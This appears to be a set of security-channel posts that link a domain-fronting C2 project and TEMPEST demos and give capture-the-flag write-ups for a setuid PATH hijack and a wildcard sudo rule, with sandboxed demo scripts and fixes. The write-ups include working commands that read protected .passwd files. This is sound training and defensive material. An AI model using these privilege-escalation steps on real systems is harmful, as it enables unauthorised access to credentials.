https://github.com/mas0yama/bahnhofzooC2.T1090.004
For my course project I implemented the Domain Fronting technique (hiding C2 traffic behind a fronting domain).
GitHub - mas0yama/bahnhofzooC2.T1090.004: C2 with basic domain fronting implemented.
So! I started poking at SQL injections on sql.training.hackerdom.ru.
Along the way I wrote up what I was doing.
Ilya Shaposhnikov
One more presentation from the conference
In the lecture on side channels, Ilya Borisovich Pugachev talked about intercepting PEMIN (spurious electromagnetic emissions and interference, the Russian term for TEMPEST-style leakage) and then reproducing the signal.
Here is an example; you can skip straight to 03:00.
https://www.youtube.com/watch?v=iSScvB4Rgj0
💥 AM TRANSMITTER made from a PC monitor. Modulating interference. Tempest for Eliza - AM Radio Signal Transmitter
Programs that use your computer's monitor to send AM radio signals.
1) Tempest AM Radio Signal Transmitter: https://github.com/priikone/tempest-AM
2) Tempest for Eliza: http://www.erikyyy.de/tempest/…
#pentest_kiddo
The first things to look at are setreuid(), setregid(), seteuid() and geteuid(). The point is that a Linux process carries several kinds of user ID (uid):
Real UID: the user who owns the process.
Effective UID: what the operating system checks when deciding whether something is allowed.
Saved set-user-ID: a copy of the effective uid taken when a setuid program starts.
A setuid-root program can temporarily drop privileges by setting its effective uid to the real uid and working as an ordinary user. Later, when it needs root back, it calls seteuid(0) and the effective uid becomes root again. This works because the saved set-user-ID was never changed.
www.root-me.org/en/Challenges/App-Script/ELF32-System-1?lang=en
So, there is a compiled binary whose C source is the following:
```c
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
    /* Make the real uid equal to the effective (setuid-owner) uid, so the
       shell spawned by system() keeps the elevated privileges instead of
       resetting euid to ruid as bash does when they differ. */
    setreuid(geteuid(), geteuid());
    /* "ls" is a bare name: it is looked up through PATH, not called by absolute path. */
    system("ls /challenge/app-noscript/ch11/.passwd");
    return 0;
}
```
Obviously, we need to read the .passwd file, and there is no way to recompile this code. So, we may try setting up an alias or editing the $PATH variable.
An alias is a shell feature: any environment that invokes utilities directly, without involving a shell, will not see aliases.
Note: even when calling shell commands from languages such as Python (using, e.g., os.system()), user-specific shell initialization files are typically not read, so user-specific aliases still won't be visible.
A directory added to the $PATH environment variable, on the other hand, is respected by any process that tries to invoke an executable by mere filename, whether via a shell or not.
This still assumes that the calling process sees the $PATH additions of interest: additions made by user-specific initialization files are typically not seen unless the calling process was launched from an interactive shell. Here the binary is started from our shell, so it inherits our PATH.
All in all, the solution is as follows:
```sh
cp /bin/cat /tmp/ls
export PATH=/tmp:$PATH
```
And then run the binary.
To sum up: we don't have permission to recompile the code, so we need a workaround. For that we change the PATH environment variable, prepending /tmp, where ls is really /bin/cat, so the binary's system("ls ...") ends up running cat on .passwd.
Challenges/App - Script : Bash - System 1 [Root Me : Hacking and Information Security learning platform]
Bash - System 1 : Find your path, padawan!
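An added example, not part of the write-up or of the challenge: it reproduces the lookup that system("ls ...") performs (sh -c resolving a bare name through PATH), the hijack with a fake ls, and the fix of pinning PATH before the call. The sandbox directory, the secret file and its flag are constructed; nothing here is setuid, so it shows the resolution mechanism rather than the privilege gain:

```sh
#!/bin/sh
# Added example: not the challenge's code. It reproduces the lookup that
# system("ls ...") performs (sh -c resolving a bare name through PATH),
# the hijack with a fake `ls`, and the fix. Runs as the current user in a
# constructed temp directory; no setuid bit is involved.

SANDBOX=$(mktemp -d)                  # constructed sandbox, removed on exit
trap 'rm -rf "$SANDBOX"' EXIT
SECRET="$SANDBOX/.passwd"             # stand-in for the challenge's .passwd
printf 'flag{constructed-example}\n' > "$SECRET"

# Attacker-controlled directory whose `ls` is really `cat`: the
# `cp /bin/cat /tmp/ls` step of the write-up, done inside the sandbox.
mkdir -p "$SANDBOX/bin"
cp "$(command -v cat)" "$SANDBOX/bin/ls"

# system(3) runs its argument as `sh -c '...'`, so this is exactly the
# lookup the challenge binary does: a bare command name resolved via PATH.
victim() {
    sh -c "ls $SECRET"
}

# 1. Untouched environment: the real ls runs and only prints the path.
baseline() {
    victim
}

# 2. Attacker prepends the fake directory: `ls` is now `cat`, and the
#    content of the secret file is printed instead of its name.
hijacked() {
    ( PATH="$SANDBOX/bin:$PATH"; export PATH; victim )
}

# 3. Hardened program: it resets PATH to trusted directories before the
#    call (calling /bin/ls by absolute path would do as well). The
#    attacker's PATH entry is still in the environment but never consulted.
hardened() {
    ( PATH="$SANDBOX/bin:$PATH"; export PATH
      sh -c "PATH=/usr/bin:/bin; export PATH; ls $SECRET" )
}

printf 'baseline: %s\n' "$(baseline)"
printf 'hijacked: %s\n' "$(hijacked)"
printf 'hardened: %s\n' "$(hardened)"
```

In the C program, step 3 corresponds to calling setenv("PATH", "/usr/bin:/bin", 1) before system(), or simply writing system("/bin/ls ..."); either removes the caller's control over which ls runs.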
#pentest_kiddo
https://www.root-me.org/en/Challenges/App-Script/sudo-weak-configuration
The PDF attached above is a short summary of part of a talk on sudo.
```
-l, --list  If no command is specified, list the allowed (and forbidden)
            commands for the invoking user (or the user specified by the
            -U option) on the current host. A longer list format is used
            if this option is specified multiple times and the security
            policy supports a verbose output format.

            If a command is specified and is permitted by the security
            policy, the fully-qualified path to the command is displayed
            along with any command line arguments. If a command is
            specified but not allowed by the policy, sudo will exit with a
            status value of 1.
```
Let's start by checking which commands we are allowed to run (pic1).
We need to read .passwd from ch1cracked (pic2). From pic1 we can see that it is possible to run cat /challenge/app-noscript/notes/* as user app-noscript-ch1-cracked. Then we do the following (pic3) and see the last line of .passwd.
Challenges/App - Script : sudo - weak configuration [Root Me : Hacking and Information Security learning platform]
sudo - weak configuration : Privilege escalation
#linux_admin
After the task solved above it is probably obvious that allowing a user a specific command is not the same as restricting its arguments: when a rule contains a wildcard, sudoers matches the pattern against the whole space-separated argument string, so a `*` also swallows any extra arguments the user appends.
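As an added example (not the challenge's code and not sudo's own matcher), a small shell emulation of the sudoers(5) argument-matching rule, which makes the point above concrete: a weak wildcard rule beside a hardened one that names the permitted files. The file names under the notes directory and the path /srv/demo/.passwd are constructed for illustration:

```sh
#!/bin/sh
# Added example: neither the challenge's code nor sudo's own matcher. It
# emulates the rule documented in sudoers(5): command-line arguments are
# matched as one space-delimited string with glob semantics, so a `*` in a
# rule matches across word boundaries. A shell `case` pattern has the same
# semantics, which is all the emulation needs. The file names under the
# notes directory and /srv/demo/.passwd are constructed for illustration.

# rule_allows RULE CMDLINE -> exit status 0 if CMDLINE matches RULE.
# RULE is the command plus argument pattern as it would appear in sudoers.
rule_allows() {
    case "$2" in
        $1) return 0 ;;   # $1 unquoted on purpose: it is used as a glob
    esac
    return 1
}

# Weak rule from the challenge, meant to allow reading the notes directory.
WEAK='cat /challenge/app-noscript/notes/*'

# Hardened alternative: name each permitted file instead of globbing
# (in sudoers these would be separate entries in the Cmnd list).
STRICT='cat /challenge/app-noscript/notes/todo.txt
cat /challenge/app-noscript/notes/readme.txt'

# rules_allow RULES CMDLINE -> 0 if any newline-separated rule matches.
rules_allow() {
    printf '%s\n' "$1" | {
        while IFS= read -r rule; do
            [ -n "$rule" ] || continue
            if rule_allows "$rule" "$2"; then exit 0; fi
        done
        exit 1
    }
}

# Intended use: both rule sets allow it.
INTENDED='cat /challenge/app-noscript/notes/todo.txt'
# The `*` also swallows a second argument, so the weak rule lets the user
# read any other file as the target account; the strict rule does not.
EXTRA_ARG='cat /challenge/app-noscript/notes/todo.txt /srv/demo/.passwd'
# Same for a path that merely starts under the notes directory.
TRAVERSAL='cat /challenge/app-noscript/notes/../.passwd'

show() {
    if rules_allow "$1" "$2"; then printf 'ALLOWED  %s\n' "$2"
    else printf 'DENIED   %s\n' "$2"; fi
}

echo 'weak rule:'
show "$WEAK" "$INTENDED"; show "$WEAK" "$EXTRA_ARG"; show "$WEAK" "$TRAVERSAL"
echo 'strict rule:'
show "$STRICT" "$INTENDED"; show "$STRICT" "$EXTRA_ARG"; show "$STRICT" "$TRAVERSAL"
```

Run it and compare the two sections: the weak rule reports ALLOWED for all three command lines, the strict rule only for the intended one. Listing files explicitly (or, when a command must take no arguments at all, writing the rule with `""` after the command) is the sudoers-side fix; sudo -l is how you audit what a user has actually been granted.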